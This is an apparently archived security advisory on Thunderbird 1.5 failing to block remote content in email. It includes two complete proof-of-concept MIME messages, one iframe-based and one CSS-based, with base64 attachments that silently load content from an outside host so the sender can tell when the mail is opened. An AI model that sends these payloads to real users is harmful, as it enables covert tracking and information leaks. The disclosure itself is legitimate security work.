source: https://www.securityfocus.com/bid/16881/info

Mozilla Thunderbird is susceptible to multiple remote information-disclosure vulnerabilities. These issues are due to the application's failure to properly enforce the restriction for downloading remote content in email messages.

These issues allow remote attackers to gain access to potentially sensitive information, aiding them in further attacks. Attackers may also exploit these issues to know whether and when users read email messages.

Mozilla Thunderbird version 1.5 is vulnerable to these issues; other versions may also be affected.

* Iframe Exploit :


Subject: Thunploit by CrashFr !
From: CrashFr<crashfr@chez.com>
To: CrashFr<crashfr@chez.com>
Content-Type: multipart/related; type="multipart/alternative";
boundary="----=_NextPart_000_0000_DE61E470.78F38016"

This is a multi-part message in MIME format.

------=_NextPart_000_0000_DE61E470.78F38016
Content-Type: multipart/alternative;
boundary="----=_NextPart_001_0001_06199DF9.5C825A99"

------=_NextPart_001_0001_06199DF9.5C825A99
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit

Test by CrashFr

------=_NextPart_001_0001_06199DF9.5C825A99
Content-Type: text/html; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
<html><head>
</head><body style="margin: 0px; padding: 0px; border: 0px;">
<iframe src="cid:257481cab71f$562e86af@sysdream.com" width="100%"
height="100%" frameborder="0" marginheight="0" marginwidth="0"></iframe>
</body></html>

------=_NextPart_001_0001_06199DF9.5C825A99--

------=_NextPart_000_0000_DE61E470.78F38016
Content-Type: text/html; name="basic.html"
Content-Transfer-Encoding: base64
Content-ID: <257481cab71f$562e86af@sysdream.com>

PGh0bWw+PGhlYWQ+PC9oZWFkPjxib2R5IHN0eWxlPSJtYXJnaW46IDBweDsgcGFkZGluZzogMHB4
OyBib3JkZXI6IDBweDsiPjxpZnJhbWUgc3JjPSJodHRwOi8vd3d3LnN5c2RyZWFtLmNvbSIgd2lk
dGg9IjEwMCUiIGhlaWdodD0iMTAwJSIgZnJhbWVib3JkZXI9IjAiIG1hcmdpbmhlaWdodD0iMCIg
bWFyZ2lud2lkdGg9IjAiPjwvaWZyYW1lPg==

------=_NextPart_000_0000_DE61E470.78F38016--


* CSS Exploit :


Subject: Thunploit by CrashFr !
From: CrashFr<crashfr@chez.com>
To: CrashFr<crashfr@chez.com>
Content-Type: multipart/related; type="multipart/alternative";
boundary="----=_NextPart_000_0000_DE61E470.78F38016"

This is a multi-part message in MIME format.

------=_NextPart_000_0000_DE61E470.78F38016
Content-Type: multipart/alternative;
boundary="----=_NextPart_001_0001_06199DF9.5C825A99"

------=_NextPart_001_0001_06199DF9.5C825A99
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit

Test by CrashFr

------=_NextPart_001_0001_06199DF9.5C825A99
Content-Type: text/html; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
<html><head>
<link rel="stylesheet" type="text/css"
href="cid:257481cab71f$562e86af@sysdream.com" /></head><body>
</body></html>

------=_NextPart_001_0001_06199DF9.5C825A99--

------=_NextPart_000_0000_DE61E470.78F38016
Content-Type: text/css; name="basic.css"
Content-Transfer-Encoding: base64
Content-ID: <257481cab71f$562e86af@sysdream.com>

QGltcG9ydCB1cmwoaHR0cDovL3d3dy5zeXNkcmVhbS5jb20vdGVzdC5jc3MpOwpib2R5IHsgYmFj
a2dyb3VuZC1jb2xvcjogI0NDQ0NDQzsgfQ==

------=_NextPart_000_0000_DE61E470.78F38016--